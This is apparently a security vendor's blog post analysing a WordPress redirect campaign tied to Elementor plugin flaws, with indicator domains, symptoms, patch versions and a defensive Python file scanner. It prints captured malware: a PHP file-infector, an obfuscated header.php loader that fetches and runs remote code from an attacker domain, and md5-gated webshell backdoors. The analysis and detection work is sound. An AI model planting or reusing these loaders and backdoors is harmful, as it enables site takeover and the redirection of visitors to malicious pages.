Attacks targeting vulnerabilities in WordPress themes and plugins have only gotten worse in recent months.
The already ongoing attack campaign against the WordPress plugins Elementor Pro and Ultimate Addons for Elementor seems to have taken a new turn, with redirect hack campaigns surfacing that send users to the malicious domain digestcolect[.]com and to similar sites such as the following:
js[.]donatelloflowfirstly.ga, track[.]developfirstline[.]com/t.js?s=5, deliverynotforme[.]best, 0.beerockstars[.]ga/?p=me3gmnbugm5gi3bpgq3tknq&sub2=mtrolley83, 0.directedmyfounds[.]ga/?p=gi3tazrwga5gi3bpgizdgmq&sub2=mstimens3, well.linetoadsactive[.]com/m.js?n=nb5, 0.realhelpcompany[.]ga, fast.helpmart[.]ga/m[.]js?w=085, dock.lovegreenpencils[.]ga/m.js?n=nb5, cht.secondaryinformtrand[.]com/m.js?n=nb5, main.travelfornamewalking[.]ga/, irc.lovegreenpencils[.]ga/, etc.
Elementor and Ultimate Addons for Elementor have released updates that fix these security issues, so please update to the following versions if you haven't already:
- Elementor Pro: 2.9.4
- Ultimate Addons for Elementor: 1.24.2
Related hack: we have also seen WordPress websites redirect to tracking[.]developfirstline[.]com/t.js?s=5, loaded through an injected `<script ... type='text/javascript'>` tag.
What we know so far…
A common symptom shown by affected websites is redirection.
That said, there are also other symptoms that hint at the attack:
- Gibberish files added to the website root directory (read more about gibberish keywords in a WordPress site hack)
- Unknown files in the website root, such as wp-xmlrpc.php and wp-cl-plugin.php
- Thousands of unknown malicious JavaScript and PHP files added to the file system
- Unauthorized admin users added to the WordPress admin area
- Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
Figure: malicious JavaScript attempts being stopped by a security firewall.
What does the malicious redirect code for “tap.digestcolect.com/r.php?id=0 spam/” look like?
This code was found under a file named ‘hjghjerg‘ (comments added for readability; the `...` elisions are in the original sample):

```php
<?php
$lastRunLog = "./debugs.log";
// Re-run the infection at most once every 6400 seconds, walking up from the document root
if (file_exists($lastRunLog)) {
    $lastRun = file_get_contents($lastRunLog);
    if (time() - $lastRun >= 6400) {
        search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
        search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
        file_put_contents($lastRunLog, time());
    }
} else {
    search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
    file_put_contents('./debugs.log', time());
}

function search_file($dir,$file_to_search){
    $files = @scandir($dir);
    if($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) { @search_file( $dir,"index"); return; }
        if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file( $dir,"index"); return; }
    }
    ...
function search_file_js($dir,$file_to_search){
    $files = @scandir($dir);
    if($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) { @search_file_js( $dir,".js"); return; }
        if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_js( $dir,".js"); return; }
    }
    // Recurse into every directory and hand each .js file to make_it_js()
    foreach($files as $key => $value){
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
                make_it_js($path);
            }
        } else if($value != "." && $value != "..") {
            search_file_js($path, $file_to_search);
        }
    }
}
// Prepends the payload $l2 (empty in this sample) to every .js file that does not yet carry the 'mndfhghjf' marker
function make_it_js($f){
    $g = file_get_contents($f);
    if (strpos($g, 'var') !== false) {
        $g = file_get_contents($f);
        if (strpos($g, 'mndfhghjf') !== false) { } else {
            $l2 = "";
            $g = file_get_contents($f);
            $g = $l2.$g;
            @system('chmod 777 '.$f);
            @file_put_contents($f,$g);
            $g = file_get_contents($f);
            if (strpos($g, 'mndfhghjf') !== false) { }
        }
    }
}
// Same for index files, using the 'trackstatisticsss' marker
function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, 'trackstatisticsss') !== false) { } else {
        $l2 = "";
        $g = $l2.$g;
        @system('chmod 777 '.$f);
        @file_put_contents($f,$g);
        $g = file_get_contents($f);
        if (strpos($g, 'trackstatisticsss') !== false) { }
    }
}
```

This code was found in the header.php file (the chr() chains decode to the names given in the comments; the sample is cut off in the original where marked `. ..`):

```php
<?php
// $c decodes to "base64_decode", $d to "file_get_contents"
$c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115);
// Fetches and base64-decodes http://css.digestcolect.com/m.txt
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104); // file name "h"
// Writes "<?php " followed by the remote payload to that file, includes it, then deletes it
@file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1);
?><?php
// Backdoor: active when the request carries parameter "asavsdvds" and parameter "lgkfghdfh" matches a hard-coded md5
if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100). ..
chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);
$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);                   // "decode"
$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1;          // "base64_decode"
$z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);                      // "<?php "
$z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]);   // PHP code supplied base64-encoded in request parameter "d1"
$z3 = $b2($_REQUEST[chr(100).chr(49)]);
@$n3($a,$z2); @include($a);@unlink($a);
$a = chr(47).chr(116).chr(109).chr(112).chr(47).$a;                            // retries under "/tmp/"
@$n3($a,$z2); @include($a);@unlink($a);die();
} ?><?php
// Second backdoor, gated on md5($_GET[5]); the code arrives split across four cookies or POST fields
if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {
    function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];}
    function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}
    $_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));
    if(!empty($_1)){
        // reversed, hex-decoded (pack "H*") and rot13'd, then executed through create_function
        $_1=str_rot13(@pack(_1896550334(4),strrev($_1)));
        if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}
    }else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}   // "local-error-not-found"
    die();
} ?>
<script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
```
This code was found under some core theme files:
```html
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
```
Know More About Malware Redirect
Hackers target WordPress sites on a regular basis. Certain commonly hacked WordPress files are frequent targets, but the scenario is somewhat different in the case of a WordPress redirect hack.
Here attackers inject malicious code into your site. Often, the administrator is unaware of the attack and only learns about it after users complain. This is the typical behaviour of a “WordPress redirect hack”.
How do you confirm if your website has been infected with a redirection hack? In addition to complaints from your customers, here are some common symptoms:
- You receive complaints from your customers who are redirected to another spammy site.
- Your website is blacklisted by Google and may show warnings such as “Deceptive site ahead” or “This site may be hacked”.
- Your homepage contains automatic push notifications that you haven’t added.
- The index.php and .htaccess files of your main WP installation contain unidentified, malicious JavaScript code.
- Your WordPress hosting server contains lots of junk files with suspicious filenames.
- You find malicious code injected into the header.php and footer.php files of your installed theme, redirecting your visitors to other domains such as default7.com or test246.com.
Diagnosing this malware is fairly easy, but fixing it is difficult: hackers keep developing new, sneakier variants that affect different parts of your website in different ways, making them much harder to detect.
This malware also creates WP user accounts with administrator privileges, so it is essential to eliminate it from your website. We have an in-depth guide on how to remove malicious code from your WordPress site.
How does Redirect Hack Affect Your Website?
Although it may seem obvious, here are a few ways this hack can derail your business:
- A significant loss of traffic and engagement
- Damage to your hard-earned online reputation and brand trust; your redirected visitors will likely never return.
- SEO spam can hurt your Google ranking, leading to further loss of inbound traffic
- Additional downtime after being suspended by your host or blacklisted by Google.
- Blocked access to your WP Admin dashboard, which could prevent you from taking quick action.
Don't worry, we have you covered. Check out our detailed article on fixing redirect malware in a WordPress site.
Detecting Redirect Malware on a Website
The heuristic test involves visiting your site from multiple devices. If the site or a page redirects you, it is probably a malware redirect. From there, inspect the files to determine the root cause.
JS files
Usually, core files are modified with JavaScript to create redirects. Themes and plugins are the most vulnerable; in some cases, an entire set of rogue themes and plugins is downloaded.
Depending on the malware variant, the injected code may be base64-encoded.
The script itself is usually served from a domain that turns out to be malicious. Users are redirected with code such as:
window.location.href="hxxp://go.ad2up[.]com/afu.php?id=473791";
This code then displays spam advertisements to users. Therefore, it is crucial to detect which specific script initiates the malware redirect.
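As an added example (not code from the original post or from WP Hacked Help), the Python script below turns the indicators described in the symptom list and in the quoted samples above into a file scan: it walks a WordPress tree, flags the 'mndfhghjf' / 'trackstatisticsss' markers, script tags loading from the domains named in this post, `window.location.href` redirects and md5-gated or create_function webshell patterns, and decodes long chr() chains like those in the header.php sample so the hidden function names and URLs become readable. The sample install it scans is constructed inline; the markers, domains and injection shapes are the ones quoted on this page.

```python
import re
import tempfile
from pathlib import Path

# Markers, domains and patterns taken from the malware samples quoted in this post.
MARKERS = ("mndfhghjf", "trackstatisticsss")
BAD_DOMAINS = ("digestcolect.com", "developfirstline.com", "ad2up.com")
TOKEN = re.compile(r"""chr\((\d+)\)|"([^"]*)"|'([^']*)'""")
CHR_CHAIN = re.compile(r"""(?:chr\(\d+\)|"[^"]*"|'[^']*')(?:\s*\.\s*(?:chr\(\d+\)|"[^"]*"|'[^']*'))+""")
SCRIPT_SRC = re.compile(r"""<script[^>]+src=['"]([^'"]+)['"]""", re.I)
JS_REDIRECT = re.compile(r"""window\.location(?:\.href)?\s*=\s*['"](?:https?|hxxp)://([^/'"]+)""")

def decode_chr_chain(expr: str) -> str:
    """Concatenate a PHP chr(n).'literal' chain into the string it builds at runtime."""
    return "".join(chr(int(n)) if n else (dq or sq) for n, dq, sq in TOKEN.findall(expr))

def scan_text(text: str) -> list[str]:
    """Return findings for one file's contents; an empty list means nothing suspicious."""
    findings = [f"marker string {m!r}" for m in MARKERS if m in text]
    findings += [f"script tag loading {s}" for s in SCRIPT_SRC.findall(text) if any(d in s for d in BAD_DOMAINS)]
    # Long chr() chains hide function names and URLs; report what they decode to.
    findings += [f"chr() chain decodes to {decode_chr_chain(c)!r}" for c in CHR_CHAIN.findall(text) if c.count("chr(") >= 6]
    findings += [f"JS redirect to {host}" for host in JS_REDIRECT.findall(text)]
    if "create_function(" in text or re.search(r"md5\(\$_(?:GET|REQUEST|POST)\[", text):
        findings.append("webshell pattern (create_function or md5-gated request parameter)")
    return findings

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a WordPress install; report every .php/.js/.htaccess file with findings."""
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and (path.suffix in (".php", ".js") or path.name == ".htaccess"):
            if hits := scan_text(path.read_text(errors="replace")):
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample install: one clean file plus the injection shapes quoted in the post.
SAMPLES = {
    "wp-content/themes/x/header.php": '<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; ?><script src=\'https://css.digestcolect.com/g.js\'></script>',
    "wp-includes/x.js": 'var mndfhghjf=1;window.location.href="http://go.ad2up.com/afu.php?id=473791";',
    "wp-config.php": "<?php define('DB_NAME', 'wp'); $table = 'wp_' . 'posts';",
}

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            (Path(tmp) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(tmp) / rel).write_text(body)
        for name, hits in sorted(scan_tree(Path(tmp)).items()):
            print(name, "->", "; ".join(hits))
```

Point `scan_tree` at the real document root of a suspected site; the clean wp-config.php sample shows that ordinary string concatenation does not trigger the chr() heuristic.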
For more help, you can contact WP Hacked Help to fix Targeted Redirection Attacks to Digestcolect .com on WordPress Websites.
Conclusion – Websites Redirecting to Digestcolect .com
We hope this article helped you understand the redirect hack linked to vulnerabilities in Elementor Pro and gave you the knowledge and tools to secure your website from hackers. This hack is one of the most ubiquitous and yet most damaging hacks.
Have you faced any other hacks on your WordPress site? WP Hacked Help would love to help you. Let us know about it; our team handles many WordPress hack cleanup requests on a regular basis, and 24/7 support is available.
